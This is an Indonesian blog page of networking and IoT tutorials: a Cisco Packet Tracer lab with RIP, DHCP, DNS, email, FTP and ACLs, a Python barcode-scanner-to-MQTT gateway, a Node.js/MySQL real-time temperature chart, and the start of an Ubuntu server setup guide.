My Blog

Cisco Packet Tracer

Hasan Amin — Sun, 26 Oct 2025 01:18:16 GMT

Pendahuluan

Dalam ujikompetensi jaringan komputer, salah satu keterampilan penting yang harus dikuasai adalah kemampuan merancang, mengonfigurasi, dan menguji jaringan menggunakan Cisco Packet Tracer.
Artikel ini membahas panduan lengkap pembuatan simulasi jaringan yang mencakup Routing RIP, layanan DNS, Web, Email, FTP, serta konfigurasi firewall server.

🧱 1. Merancang Topologi Jaringan

Diberikan topologi seperti gambar berikut:

Langkah-langkah:

Tambahkan device:
- 6 Router, gunakan Router-PT-Empty untuk R1 sd R6
- 1 Switch
- 3 PC kabel
- 3 Laptop wireless
- 1 Wireless Router
- 2 Server (DNS & Web, Email & FTP)
Tambahkan modul interface sebanyak yang di perlukan, gunakan PT-ROUTER-NM-1CGE untuk interface GigabitEthernet (jangan lupa ON-OFF kan terlebih dahulu device nya)
Lakukan pengkabelan sesuai tipe koneksi.

pengkabelan di sesuaikan dengan jenis koneksi, jika koneksi sesama jenis device maka gunakan cable cross over, jika berbeda jenis device maka gunakan straight through

Terkhusus untuk koneksi dari R4 ke HomeRouter, pilih internet port

🏷️ 2. Menambahkan Label

Tambahkan label network dan subnet mask:
Contoh: 192.168.0.0/24, 10.0.0.0/8, 11.0.0.0/8, dst.
Beri label alamat IP pada setiap interface router dan server.

🌐 3. Konfigurasi IP Address

a. Router

Masuk ke Config → Interface, aktifkan interface dan isi IP sesuai subnet.

Berikut tabel pemetaan IP pada tiap Router yang saling terhubung (Disesuaikan dengan koneksi anda masing-masing)

Connection	Interface	IP
R1 - Switch0	GigabitEthernet8/0	192.168.0.1
R1 - R2	GigabitEthernet9/0	10.0.0.1
R2 - R1	GigabitEthernet6/0	10.0.0.2
R2 - R3	GigabitEthernet7/0	20.0.0.2
R3 - R2	GigabitEthernet6/0	20.0.0.1
R3 - HomeRouter	GigabitEthernet7/0	192.168.1.1
R2 - R4	GigabitEthernet8/0	30.0.0.2
R4 - R2	GigabitEthernet6/0	30.0.0.1
R4 - R5	GigabitEthernet7/0	40.0.0.2
R5 - R4	GigabitEthernet6/0	40.0.0.1
R5 - DNS & WEB SERVER	GigabitEthernet7/0	11.0.0.1
R4 - R6	GigabitEthernet8/0	50.0.0.2
R6 - R4	GigabitEthernet6/0	50.0.0.1
R6 - EMAIL & FTP SERVER	GigabitEthernet7/0	12.0.0.1

Sebagai contoh configurasi IP di R1 koneksi R1 - R2 interface GigabitEthernet9/0. Lakukan untuk semua Router

Dikarenakan R1 merupakan router LAN1 maka kita akan configurasi menjadi DHCP server. Berikut adalah command DHCP di R1

Router>enable
Router#config
Router(config)#ip dhcp pool LAN1
Router(dhcp-config)#network 192.168.0.0 255.255.255.0
Router(dhcp-config)#default-router 192.168.0.1
Router(dhcp-config)#dns-server 11.0.0.100
Router(dhcp-config)#exit

b. Server

Server	IP Address	Network	Fungsi
DNS & Web Server	11.0.0.100	11.0.0.0/8	Penerjemah domain dan web
Email & FTP Server	12.0.0.100	12.0.0.0/8	Email dan FTP server

Kik Servernya - Pilih Desktop - IP Configuration

Configurasi IP di DNS & Web server

Default gateway diisi dengan IP router yang konek ke server (R5 = 11.0.0.1)

DNS server diisi dengan IP server itu sendiri 11.0.0.100

Configurasi IP di Email & FTP server

Default gateway diisi dengan IP router yang konek ke server (R6 = 12.0.0.1)

DNS server diisi dengan IP server itu sendiri 12.0.0.100

c. Wireless Router

Network: 192.168.100.0/24
Gateway: 192.168.100.1
SSID: UJIKOM_NET

Klik HomeRouter - Pilih GUI
- Internet Setup
- Network Setup
  
  Klik tombol Save Settings
- Wireless Setup

d. PC & Laptop

IP Static sesuai subnet masing-masing.
- Laptop
  
  Agar tiap laptop bisa menangkap sinyal hotspot dari HomeRouter, maka laptopnya harus di tambahkan modul interface wifi (WPC300N) dengan mengganti interface LAN
- Kemudian config wifi di sisi laptop dengan cara klik Desktop - Wireless
  
  Pilih Connect - Refresh - Pilih SSID UJIKOM_NET - Klik tombol Connect
PC

Untuk PC kita akan configurasi IP secara static terlebih dahulu

Klik PC - Desktop - IP Configuration - DHCP

🔁 4. Konfigurasi Routing (RIP)

Masuk ke Router → Config → RIP:

Centang setiap network yang terhubung ke router tersebut.
- R1
- R2
- R3
- R4
- R5
- R6
Pastikan routing berjalan (uji dengan ping antar subnet).

ping dari PC ke Server DNS berhasil

ping dari laptop ke server Email berhasil

⚙️ 5. Konfigurasi Layanan Server

🧭 a. DNS Server

Aktifkan service DNS.
Tambahkan record berikut di service server DNS:
- myweb.net → 11.0.0.100
- mymail.net → 12.0.0.100
- myftp.net → 12.0.0.100

🌍 b. Web Server

Aktifkan HTTP dan HTTPS.
Ubah halaman utama (index.html) dengan identitas kelompok ujikom.

✉️ c. Email Server

Aktifkan SMTP dan POP3.
Tambahkan user seperti:
- pc1@myemail.net
- lp1@myemail.net

📁 d. FTP Server

Aktifkan FTP Service.
Tambahkan akun dan password untuk login.

🧪 e. Uji Coba

Akses myweb.net via browser PC.
Ping domain dari PC.

Kirim email antar user.

Configurasi Email client

Klik PC/Leptop - Desktop - Email
Test kirim email dari PC1 ke LP1
cek di inbox LP1

Konfigurasi FTP Client
- Buat file baru mydata.txt
- Kirim file mydata.txt ke server FTP

🔒 6. Konfigurasi Firewall Server

Masuk ke Server → Config → Firewall
Aktifkan firewall dan tambahkan rule:

💡 Tips: Uji firewall dengan mencoba akses port yang tidak diizinkan — harus “Request timed out”.

💾 7. Backup & Restore Konfigurasi

Simpan konfigurasi router:
Untuk restore:

✅ Hasil Akhir yang Diharapkan

Semua device saling terhubung.
Routing RIP bekerja stabil.
DNS, Web, Email, dan FTP berfungsi.
Firewall hanya mengizinkan port layanan utama.
Semua konfigurasi tersimpan dan dapat direstore.

Bonus Pelatihan

Hasan Amin — Sun, 27 Jul 2025 07:44:50 GMT

🔹 Studi Kasus:

PT. Sinar Teknologi mendirikan jaringan untuk kampus barunya yang mencakup koneksi internet, routing antar divisi, server internal (DNS, Web, Email, FTP), serta keamanan jaringan menggunakan ACL dan kemampuan backup konfigurasi router.

🧠 Pertanyaan

💡 Bagian 1: Topologi & Koneksi

Gambarkan kembali topologi jaringan kampus berdasarkan skenario yang diberikan.
Sebutkan peran masing-masing router (Router1, Router2, Router3) dalam sistem jaringan tersebut.
Jelaskan bagaimana komunikasi antara PC1 dan FTP server dapat terjadi melewati router mana saja.

💡 Bagian 2: DHCP dan Wireless Router

Apa fungsi DHCP pada Router1? Jelaskan bagaimana IP diberikan ke klien.
Konfigurasikan Wireless Router agar:
- Memberikan IP ke klien secara otomatis
- Terhubung ke internet melalui Router1
- Menggunakan enkripsi WPA2 dengan passphrase kampus_aman
Setelah konfigurasi wireless router selesai, bagaimana cara Anda memverifikasi bahwa Laptop sudah terhubung ke jaringan dan internet?

💡 Bagian 3: Routing dan IP Addressing

Buat konfigurasi lengkap pada Router1 agar dapat terhubung ke jaringan Router3 menggunakan static routing.
Mengapa pada Router2 dan Router3 digunakan protokol RIP? Apa kelebihan dan kekurangannya?
Buat perintah konfigurasi RIP untuk Router2 dan Router3 berdasarkan IP yang digunakan.

💡 Bagian 4: Konfigurasi Server

Jelaskan fungsi dari masing-masing server berikut:
- DNS Server
- Web Server
- Email Server
- FTP Server
Buat konfigurasi untuk DNS Server yang menunjuk ke:
- kampus.web → 40.40.40.2
- kampus.mail → 40.40.40.3
- kampus.ftp → 40.40.40.4
Buat konten halaman utama Web Server yang menampilkan pesan: “SELAMAT DATANG DI KAMPUS”
Buat konfigurasi Email Server dan uji kirim email dari mahasiswa1@kampus.mail ke dosen@kampus.mail.

💡 Bagian 5: Keamanan Jaringan (Firewall)

Konfigurasikan ACL di Router1 agar:
- Hanya jaringan 192.168.50.0/24 dan 192.168.70.0/24 yang boleh mengakses keluar
- Blokir semua trafik lainnya
Mengapa ACL diletakkan pada interface Serial0/0/0 di arah inbound?

💡 Bagian 6: Backup dan Restore

Jelaskan langkah-langkah untuk melakukan backup konfigurasi router ke FTP Server.
Setelah backup, bagaimana cara melakukan restore konfigurasi jika router mengalami reset?

💡 Bagian 7: Troubleshooting

PC tidak mendapatkan IP dari DHCP. Sebutkan 3 langkah troubleshooting yang harus dilakukan.
Ketika ping kampus.web gagal, bagaimana cara Anda memastikan apakah masalah ada pada DNS atau Web Server?
Jelaskan perintah untuk melihat routing table dan memverifikasi apakah jalur antar jaringan telah tersedia.

Perangkat yang Dibutuhkan:

4 Router (Cisco 2911)
2 Switch (Cisco 2960)
3 PC
2 Laptop
1 Wireless Router (WRT300N)
4 Server (DNS, Web, Email, FTP)

Skema Koneksi

Router1 → Switch1 (Fa0/0 ↔ Fa0/1)
Router1 → Wireless Router (Fa0/1 ↔ Internet Port)
Router1 → Router2 via Serial0/0/0
Router2 → Router3 via Serial0/0/1
Router3 → Switch2 (Fa0/0 ↔ Fa0/1)
Switch2 → Server DNS/Web/Email/FTP (Fa0/2-Fa0/5)

Langkah 1: Konfigurasi Dasar Router dan DHCP

Router1 (Gateway Utama)

enable
configure terminal
hostname Router1

ip dhcp pool JARINGAN_KAMPUS
  network 192.168.50.0 255.255.255.0
  default-router 192.168.50.1
  dns-server 10.10.10.2
exit

interface GigabitEthernet0/0
  ip address 192.168.50.1 255.255.255.0
  no shutdown
exit

interface GigabitEthernet0/1
  ip address 192.168.60.1 255.255.255.0
  no shutdown
exit

interface Serial0/3/0
  ip address 20.20.20.1 255.255.255.252
  clock rate 64000
  no shutdown
exit

Wireless Router Configuration

Internet Setup

IP Address: 192.168.60.2
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.60.1
DNS Server: 10.10.10.2

LAN Setup

IP Address: 192.168.70.1
Subnet Mask: 255.255.255.0
DHCP Start IP: 192.168.70.100
Maximum Users: 50

Wireless Security

Mode: WPA2 Personal
Passphrase: kampus_aman

Langkah 2: Konfigurasi Routing

Router1 (Static Routing)

ip route 30.30.30.0 255.255.255.0 20.20.20.2

Router2 (RIP Routing)

enable
configure terminal
hostname Router2

interface Serial0/0/0
  ip address 20.20.20.2 255.255.255.252
  no shutdown
exit

interface Serial0/0/1
  ip address 30.30.30.1 255.255.255.252
  no shutdown
exit

router rip
  version 2
  network 20.20.20.0
  network 30.30.30.0
  no auto-summary
exit

Router3 (RIP Routing)

enable
configure terminal
hostname Router3

interface Serial0/0/0
  ip address 30.30.30.2 255.255.255.252
  no shutdown
exit

interface FastEthernet0/0
  ip address 40.40.40.1 255.0.0.0
  no shutdown
exit

router rip
  version 2
  network 30.30.30.0
  network 40.40.40.0
  no auto-summary
exit

Langkah 3: Konfigurasi Server

DNS Server (IP: 10.10.10.2)

IP Configuration:

Static IP: 10.10.10.2
Subnet Mask: 255.0.0.0
Default Gateway: 10.0.0.1

DNS Service:

On
Resource Records:
- kampus.web A 40.40.40.2
- kampus.mail A 40.40.40.3
- kampus.ftp A 40.40.40.4

Web Server (IP: 40.40.40.2)

<html>
<center><h1 style="color:green;">SELAMAT DATANG DI KAMPUSh1>center>
html>

Email Server (IP: 40.40.40.3)

Domain Name: kampus.mail
User Setup:
- mahasiswa1 / mhs123
- dosen / dosen456

FTP Server (IP: 40.40.40.4)

Username: ftp_kampus
Password: ftp123
Permission: Read/Write

Langkah 4: Konfigurasi Firewall

Router1 (ACL)

ip access-list extended FILTER_JARINGAN
  permit ip 192.168.50.0 0.0.0.255 any
  permit ip 192.168.70.0 0.0.0.255 any
  deny ip any any
exit

interface Serial0/0/0
  ip access-group FILTER_JARINGAN in
exit

Langkah 5: Uji Coba Jaringan

Uji DNS dan Web

Akses URL: http://kampus.web dari PC1
Verifikasi tampilan halaman web

Uji Email

Email: mahasiswa1@kampus.mail
Password: mhs123
Server: kampus.mail
Kirim ke: dosen@kampus.mail

Uji FTP

ftp kampus.ftp
Username: ftp_kampus
Password: ftp123
put laporan.txt

Uji Wireless

Connect ke SSID kampus_aman
Verifikasi dapat IP dan akses internet

Langkah 6: Backup dan Restore Konfigurasi

Backup Konfigurasi Router

copy running-config ftp:
Address of remote host: 40.40.40.4
Destination filename: backup_router1

Restore Konfigurasi Router

copy ftp: startup-config
Address of remote host: 40.40.40.4
Source filename: backup_router1
Destination filename: startup-config

Troubleshooting

PC tidak dapat IP: Periksa DHCP dan koneksi kabel
Tidak bisa ping antar jaringan: Periksa routing (show ip route)
Web/email gagal: Pastikan DNS aktif, cek nslookup

Membuat QR Code Scanner USB ke MQTT Gateway di Linux Menggunakan Python

Hasan Amin — Thu, 05 Jun 2025 21:07:32 GMT

Pendahuluan

Dalam dunia industri modern, mengintegrasikan perangkat input seperti scanner barcode ke dalam sistem berbasis IoT atau backend server adalah hal penting. Artikel ini menunjukkan cara membangun sistem scanner QR/Barcode berbasis USB yang otomatis mengirimkan hasil scan ke broker MQTT menggunakan Python di Linux.

Prasyarat

Linux (contoh: Debian, Ubuntu, Orange Pi)
Scanner barcode USB
Python 3.x
MQTT broker (bisa lokal atau cloud seperti Mosquitto, EMQX)

1. Cek dan Identifikasi Scanner USB

Sambungkan scanner barcode ke port USB. Gunakan perintah berikut untuk melihat apakah perangkat terdeteksi:

lsusb

Contoh output:

Bus 001 Device 005: ID 0c2e:0b61 Scanner Scanner

Catat Vendor ID dan Product ID (contoh: 0c2e:0b61). Ini akan membantu dalam mengidentifikasi device secara eksplisit jika diperlukan.

Lanjutkan dengan mengecek event device dari scanner:

ls -l /dev/input/by-id/

Output yang dituju:

usb-Scanner_Scanner_20180411-event-kbd -> ../event0

Catat path ke device, misalnya /dev/input/event0. Ini akan digunakan dalam kode.

2. Instalasi Library yang Dibutuhkan

sudo apt update
sudo apt install python3-pip
pip3 install evdev paho-mqtt

3. Struktur Kode Scanner

Letakkan skrip di /opt/qrscanner/scanner_evdev_mqtt.py:

import traceback
import paho.mqtt.client as mqtt
import json
from datetime import datetime
import warnings
from evdev import InputDevice, categorize, ecodes, list_devices

warnings.filterwarnings("ignore", category=DeprecationWarning)

# Konfigurasi MQTT
MQTT_BROKER = "broker.hivemq.com"
MQTT_PORT = 1883
MQTT_TOPIC = "scanner/iot"

# Mapping Key Code
KEY_MAP = {
    2: '1', 3: '2', 4: '3', 5: '4', 6: '5', 7: '6', 8: '7', 9: '8', 10: '9', 11: '0',
    12: '-', 13: '=', 14: 'Backspace', 15: 'Tab', 16: 'q', 17: 'w', 18: 'e', 19: 'r',
    20: 't', 21: 'y', 22: 'u', 23: 'i', 24: 'o', 25: 'p', 26: '[', 27: ']', 28: 'Enter',
    29: 'Ctrl', 30: 'a', 31: 's', 32: 'd', 33: 'f', 34: 'g', 35: 'h', 36: 'j', 37: 'k',
    38: 'l', 39: ';', 40: "'", 41: '`', 42: 'Shift', 43: '\', 44: 'z', 45: 'x',
    46: 'c', 47: 'v', 48: 'b', 49: 'n', 50: 'm', 51: ',', 52: '.', 53: '/', 54: 'Shift',
    55: '*', 56: 'Alt', 57: ' ', 100: 'AltGr'
}

SHIFT_MAP = {
    '1': '!', '2': '@', '3': '#', '4': '$', '5': '%', '6': '^', '7': '&',
    '8': '*', '9': '(', '0': ')', '-': '_', '=': '+', '[': '{', ']': '}',
    '\': '|', ';': ':', "'": '"', ',': '<', '.': '>', '/': '?', '`': '~'
}

TARGET_SCANNER_NAME = "Scanner Scanner"

# Deteksi scanner
def find_scanner_device(target_name=TARGET_SCANNER_NAME):
    devices = [InputDevice(path) for path in list_devices()]
    for dev in devices:
        if dev.name == target_name:
            return dev
    return None

# Kirim hasil ke MQTT
def publish_scanned_data(data):
    try:
        payload = {
            "timestamp": datetime.now().isoformat(),
            "scanned": data
        }
        client = mqtt.Client()
        client.connect(MQTT_BROKER, MQTT_PORT, 60)
        client.publish(MQTT_TOPIC, json.dumps(payload))
        client.disconnect()
    except Exception as e:
        print("[ERROR] MQTT publish failed:", e)
        traceback.print_exc()

# Fungsi utama scanner
def read_scanner():
    dev = find_scanner_device()
    if dev is None:
        print("[ERROR] Scanner not found.")
        return

    shift = False
    scanned = ''

    for event in dev.read_loop():
        if event.type == ecodes.EV_KEY:
            data = categorize(event)
            if data.keystate == 1:
                key = KEY_MAP.get(data.scancode, '')
                if key == 'Shift':
                    shift = True
                elif key == 'Enter':
                    if scanned:
                        print("[INFO] Scanned:", scanned)
                        publish_scanned_data(scanned)
                        scanned = ''
                elif key:
                    scanned += SHIFT_MAP.get(key, key.upper()) if shift else key
                    shift = False

if __name__ == "__main__":
    read_scanner()

4. Buat Service Systemd

File: /etc/systemd/system/qrscanner.service

[Unit]
Description=QR Scanner Python Script
After=network.target

[Service]
ExecStart=/usr/bin/python3 /opt/qrscanner/scanner_evdev_mqtt.py
WorkingDirectory=/opt/qrscanner
Restart=always
RestartSec=3
StandardOutput=journal
StandardError=journal

[Install]
WantedBy=multi-user.target

Aktifkan dan jalankan service:

sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl enable qrscanner.service
sudo systemctl start qrscanner.service

5. Troubleshooting

Gunakan journalctl -u qrscanner.service -f untuk memantau log
Cek apakah device input berubah, misalnya unplug scanner lalu replug, dan amati ls -l /dev/input/by-id/
Jika error karena device tidak ditemukan, buat pengecekan di awal dan log errornya.

6. Penutup

Dengan setup ini, scanner barcode Anda akan otomatis membaca QR/Barcode dan mengirimkan hasilnya secara langsung ke server melalui MQTT. Anda bisa mengintegrasikannya dengan dashboard IoT, database, atau sistem lain untuk proses lebih lanjut.

🔥Multitier Realtime Chart Sensor Suhu via MQTT, MySQL, dan WebSocket

Hasan Amin — Wed, 28 May 2025 11:06:31 GMT

Panduan ini akan membimbing kita membuat sistem realtime monitoring suhu berbasis MQTT. Data dari sensor dikirim per detik via aplikasi smartphone (MyMQTT), kemudian:

Disubscribe oleh backend ExpressJS pada Server 1
Disimpan di MySQL pada Server 2
Dikirim ke frontend (HTML + Bootstrap + Chart.js) secara realtime menggunakan WebSocket (Socket.IO) pada Server 3

🌐 Arsitektur Tiga Server

Arsitektur topologi aplikasi ini menggunakan multitier untuk mempelajari bagaimana aplikasi yang berbeda bisa saling berkomunikasi dan berintegrasi. Maka dari itu setiap bagian dari aplikasi di deploy pada server yang berbeda.

Server 1: Backend (Express + MQTT + Socket.IO)
Server 2: Database (MySQL)
Server 3: Frontend (HTML + Chart.js + Socket.IO client)

📦 Persiapan Instalasi

Server 1: Install Node.js & Backend

Server ini berfungsi sebagai otak dari sistem, yang menerima data dari sensor (melalui MQTT), menyimpannya ke database (MySQL di Server 2), dan kemudian mendistribusikan data tersebut secara realtime ke frontend (di Server 3) menggunakan WebSocket.

Untuk membuat backend ini bekerja, kita membutuhkan Node.js, yaitu sebuah runtime JavaScript yang memungkinkan kita menjalankan kode JavaScript di luar browser. Dengan Node.js, kita bisa membangun aplikasi server seperti API, sistem real-time, dan sebagainya.

Langkah-langkah instalasi:

sudo apt update && sudo apt install -y nodejs npm
node -v && npm -v

Penjelasan:

nodejs adalah environment yang akan menjalankan aplikasi backend kita.
npm (Node Package Manager) digunakan untuk mengelola pustaka (library) yang akan kita butuhkan seperti express, mqtt, mysql2, dan socket.io.

Setelah Node.js terinstall, kita akan menggunakan library ini untuk develop:

REST API (menggunakan Express)
MQTT Client (untuk subscribe data dari sensor)
Koneksi ke database MySQL
Komunikasi real-time ke frontend menggunakan Socket.IO

Dengan kata lain, Server 1 ini adalah penghubung utama antara:

Sensor suhu (yang mengirimkan data)
Penyimpanan (MySQL)
Tampilan data (Chart di web browser)

Server 2: Install MySQL

Server ini berperan sebagai penyimpanan data (database server). Setiap data suhu yang dikirim dari sensor melalui aplikasi MQTT akan diteruskan oleh backend (Server 1) dan disimpan secara terstruktur di MySQL.

Mengapa perlu server terpisah untuk database?

Keamanan dan skalabilitas: Memisahkan database dari backend membuat sistem lebih aman dan mudah diskalakan.
Efisiensi: Beban kerja server dibagi antara penyimpanan dan pengolahan data.
Konsistensi dan keandalan: MySQL adalah sistem manajemen basis data yang handal untuk menyimpan data dengan relasi.

sudo apt install mysql-server
sudo mysql_secure_installation

Penjelasan:

mysql-server adalah perangkat lunak basis data yang akan kita gunakan.
mysql_secure_installation membantu mengatur keamanan dasar (seperti password root dan penghapusan user anonim).

Server 3: Web Server (optional)

Server ini berfungsi sebagai antarmuka pengguna (frontend) — tempat pengguna bisa melihat grafik suhu secara realtime melalui browser. Kita akan menggunakan Apache sebagai web server yang akan menyajikan file HTML, Bootstrap, dan Chart.js ke browser pengguna.

Mengapa dipisah ke server tersendiri?

Pemisahan tanggung jawab: Frontend fokus pada tampilan, backend fokus pada logika dan data.
Pengamanan & skalabilitas: Kita bisa memperkuat keamanan tiap layer sesuai kebutuhannya.
Efisiensi distribusi konten: Web server seperti Apache sangat efisien dalam melayani file statis (HTML, JS, CSS) ke banyak pengguna sekaligus.

sudo apt install apache2

Jika instalasi berhasil, maka untuk konfigurasi web server ada di directory /var/www/html

Setelah itu, pastikan Apache aktif:

sudo systemctl restart apache2
sudo systemctl enable apache2

Lalu akses frontend dari browser melalui:

http://

Frontend ini akan otomatis membuka koneksi WebSocket ke backend (Server 1), dan menampilkan data suhu ke chart secara realtime. Mahasiswa akan melihat bagaimana satu sistem IoT bisa terdiri dari beberapa komponen dan berkomunikasi melalui jaringan antar server.

🗄️ Konfigurasi Database (Server 2)

sudo mysql -u root -p

Buat database dan user:

CREATE DATABASE mqttdb;
CREATE USER 'mqttuser'@'%' IDENTIFIED BY 'Pass1324!@';
GRANT ALL PRIVILEGES ON mqttdb.* TO 'mqttuser'@'%';
FLUSH PRIVILEGES;
USE mqttdb;
CREATE TABLE temperatures (
  id INT AUTO_INCREMENT PRIMARY KEY,
  value FLOAT NOT NULL,
  timestamp DATETIME DEFAULT CURRENT_TIMESTAMP
);

🧠 Backend (Server 1)

1. Struktur Folder

Struktur folder untuk backend proyek ini sangat sederhana dan cukup satu level saja. Berikut struktur direktori utamanya:

mqtt-backend/
│── server.js
│── package.json

Penjelasan:

mqtt-backend/: Ini adalah folder root untuk aplikasi backend Node.js Anda. Semua file terkait backend diletakkan di sini.
server.js: File ini adalah titik masuk (entry point) dari aplikasi backend. Di dalamnya terdapat:
- Koneksi ke broker MQTT (berlangganan data suhu)
- Koneksi ke database MySQL (untuk menyimpan data suhu)
- Setup WebSocket (mengirim data ke frontend secara realtime)
- Setup Express.js (API dan routing jika diperlukan)
package.json: File ini otomatis dibuat ketika Anda menjalankan npm init. File ini berfungsi untuk:
- Mendefinisikan nama aplikasi, versi, deskripsi, dan entry point.
- Menyimpan daftar dependency (seperti express, mqtt, mysql2, dan socket.io)
- Menyediakan script seperti npm start untuk menjalankan server

💡 Tips untuk Mahasiswa:
Struktur folder yang rapi sangat penting dalam pengembangan perangkat lunak agar kode mudah dipelihara dan dikembangkan. Meskipun saat ini proyeknya kecil, struktur ini akan membantu saat proyek berkembang lebih besar.

2. Install Modul

Setelah membuat folder backend, kita akan menginisialisasi proyek Node.js dan menginstal berbagai modul yang dibutuhkan.

mkdir mqtt-backend
cd mqtt-backend
npm init -y
npm install express mysql2 mqtt socket.io cors

Penjelasan langkah demi langkah:

mkdir mqtt-backend
Membuat folder baru bernama mqtt-backend, tempat semua file backend akan disimpan.
cd mqtt-backend
Masuk ke folder tersebut untuk mulai bekerja di dalamnya.
npm init -y
Membuat file package.json secara otomatis. File ini berisi informasi tentang proyek dan dependency yang digunakan.
npm install express mysql2 mqtt socket.io cors
Menginstal semua modul yang dibutuhkan:
1. express : Framework web minimalis untuk membangun server HTTP
2. mysql2 : Driver untuk menghubungkan Node.js ke database MySQL
3. mqtt : Library untuk berlangganan ke broker MQTT dan menerima data sensor
4. socket.io : Library untuk komunikasi realtime antara backend dan frontend via WebSocket
5. cors : Middleware untuk mengizinkan akses lintas domain (diperlukan oleh frontend)

💡 Tips untuk Mahasiswa:
Dalam pengembangan backend modern, menggunakan modul-modul seperti ini memudahkan kita membangun server yang tangguh, fleksibel, dan mendukung komunikasi realtime.

3. Kode `server.js`

Berikut adalah kode lengkap backend Node.js yang:

Terhubung ke broker MQTT (misalnya via aplikasi MyMQTT)
Menyimpan data suhu ke database MySQL
Mengirim data secara realtime ke frontend melalui WebSocket

// Import modul yang dibutuhkan
const express = require('express');           // Framework untuk server HTTP
const mqtt = require('mqtt');                 // Untuk koneksi MQTT
const mysql = require('mysql2');              // Driver MySQL
const cors = require('cors');                 // Untuk mengizinkan akses dari frontend
const http = require('http');                 // Untuk membuat HTTP server manual
const { Server } = require('socket.io');      // Untuk WebSocket

const app = express();
app.use(cors());                              // Aktifkan CORS agar frontend bisa akses

const server = http.createServer(app);        // Buat HTTP server
const io = new Server(server, { cors: { origin: "*" } });  // Inisialisasi WebSocket

// Konfigurasi koneksi ke MySQL (ganti IP_SERVER2 sesuai lokasi server database)
const db = mysql.createConnection({
  host: 'IP_SERVER2',
  user: 'mqttuser',
  password: 'password123',
  database: 'mqttdb'
});

// Cek koneksi MySQL
db.connect(err => {
  if (err) return console.error('MySQL error:', err);
  console.log('Connected to MySQL');
});

// Koneksi ke broker MQTT publik (bisa juga pakai lokal jika punya)
const mqttClient = mqtt.connect('mqtt://broker.hivemq.com');

// Saat konek ke MQTT, subscribe ke topik `sensor/suhu`
mqttClient.on('connect', () => {
  console.log('MQTT Connected');
  mqttClient.subscribe('sensor/suhu');
});

// Saat menerima pesan dari topik MQTT
mqttClient.on('message', (topic, message) => {
  const suhu = parseFloat(message.toString());   // Ambil nilai suhu
  if (!isNaN(suhu)) {
    // Simpan ke database
    db.query('INSERT INTO temperatures (value) VALUES (?)', [suhu], err => {
      if (err) return console.error(err);
      const timestamp = new Date().toISOString();
      // Kirim ke frontend melalui WebSocket
      io.emit('new-data', { value: suhu, timestamp });
    });
  }
});

// Endpoint untuk ambil data terbaru (20 data terakhir)
app.get('/api/data', (req, res) => {
  db.query('SELECT * FROM temperatures ORDER BY timestamp DESC LIMIT 20', (err, results) => {
    if (err) return res.status(500).send('DB error');
    res.json(results.reverse());  // Dibalik agar urutan waktu dari lama ke baru
  });
});

// Log ketika ada koneksi WebSocket dari frontend
io.on('connection', (socket) => {
  console.log('Client connected:', socket.id);
});

// Jalankan server di port 3000
server.listen(3000, () => {
  console.log('Backend running on http://:3000');
});

Cara Menjalankan Backend:

node server.js

Jika berhasil, Anda akan melihat log:

Backend running on http://:3000
MQTT Connected
Connected to MySQL

🎓 Catatan untuk Mahasiswa:

Backend ini adalah jembatan antara sensor (via MQTT), database (MySQL), dan frontend (melalui WebSocket).

Pendekatan ini sangat ideal untuk aplikasi IoT realtime karena efisien dan scalable.

🎨 Frontend (Server 3)

1. HTML File (`index.html`)

File ini adalah tampilan sederhana berbasis HTML untuk menampilkan data suhu secara realtime menggunakan Chart.js dan Socket.IO.

html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Sensor Suhu Realtimetitle>
  
  <script src="https://cdn.jsdelivr.net/npm/chart.js">script>
  
  <script src="https://cdn.socket.io/4.7.2/socket.io.min.js">script>
  
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
head>
<body class="p-5">
  <h2>Sensor Suhu Realtimeh2>
  <canvas id="suhuChart" width="600" height="300">canvas>

  <script>
    // Inisialisasi koneksi ke backend menggunakan WebSocket
    const socket = io('http://:3000');

    // Ambil elemen canvas untuk grafik
    const ctx = document.getElementById('suhuChart').getContext('2d');

    // Buat grafik awal (kosong)
    const chart = new Chart(ctx, {
      type: 'line',
      data: {
        labels: [],  // Label waktu
        datasets: [{
          label: 'Suhu (°C)',
          data: [],
          borderColor: 'red',
          tension: 0.3,
        }]
      }
    });

    // Ketika ada data baru dari server
    socket.on('new-data', (data) => {
      const time = new Date(data.timestamp).toLocaleTimeString(); // Format waktu
      chart.data.labels.push(time);         // Tambah waktu ke label
      chart.data.datasets[0].data.push(data.value); // Tambah suhu ke grafik

      // Maksimal 20 data terakhir saja yang ditampilkan
      if (chart.data.labels.length > 20) {
        chart.data.labels.shift();          // Hapus label tertua
        chart.data.datasets[0].data.shift(); // Hapus data tertua
      }

      chart.update(); // Update grafik di browser
    });
  script>
body>
html>

Simpan di folder yang bisa diakses web server (/var/www/html atau nginx/html).

🔍 Penjelasan Utama:

Chart.js: Library visualisasi data, dipakai untuk menggambar grafik suhu.
Socket.IO: Digunakan untuk menerima data secara realtime dari server.
Bootstrap: Library CSS agar tampilan frontend rapi tanpa perlu menulis CSS manual.
: Ganti dengan IP dari Server 1 tempat backend berjalan.

🎓 Catatan untuk Mahasiswa:
File ini bisa disimpan di server Apache (misalnya di /var/www/html) agar bisa diakses lewat browser dari berbagai perangkat dalam jaringan yang sama.

📱 Pengiriman Data

Gunakan aplikasi MyMQTT di HP:

Broker: broker.hivemq.com
Publish ke topic: sensor/suhu
Data: angka suhu, misal 34, 35, 36 per detik

🚀 Penutup

✅ Kita sekarang memiliki sistem sensor suhu realtime dengan MQTT, MySQL, dan WebSocket yang ringan dan efisien.
Silakan dikembangkan untuk fitur lain seperti alert, dashboard login, grafik mingguan, dll.

Ditulis oleh: Hasan Amin
Follow saya di Hashnode dan GitHub untuk project open source lainnya.

Instalasi & Konfigurasi Layanan Server Ubuntu

Hasan Amin — Thu, 22 May 2025 07:47:37 GMT

Panduan ini membantu Anda mengatur Ubuntu Server untuk administrasi jaringan dan aplikasi web secara bertahap.

1. 🔄 Update & Upgrade Sistem

sudo apt update -y

2. 🔐 OpenSSH Server

Untuk login ke server secara remote.

sudo apt install openssh-server -y
sudo systemctl status ssh

3. 🧱 UFW (Uncomplicated Firewall)

Mengatur lalu lintas jaringan.

sudo apt install ufw -y
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow OpenSSH
sudo ufw enable

4. 🌐 Apache2 Web Server

Menjalankan server HTTP.

sudo apt install apache2 -y
sudo ufw allow 'Apache Full'

Cek: http://IP-Server

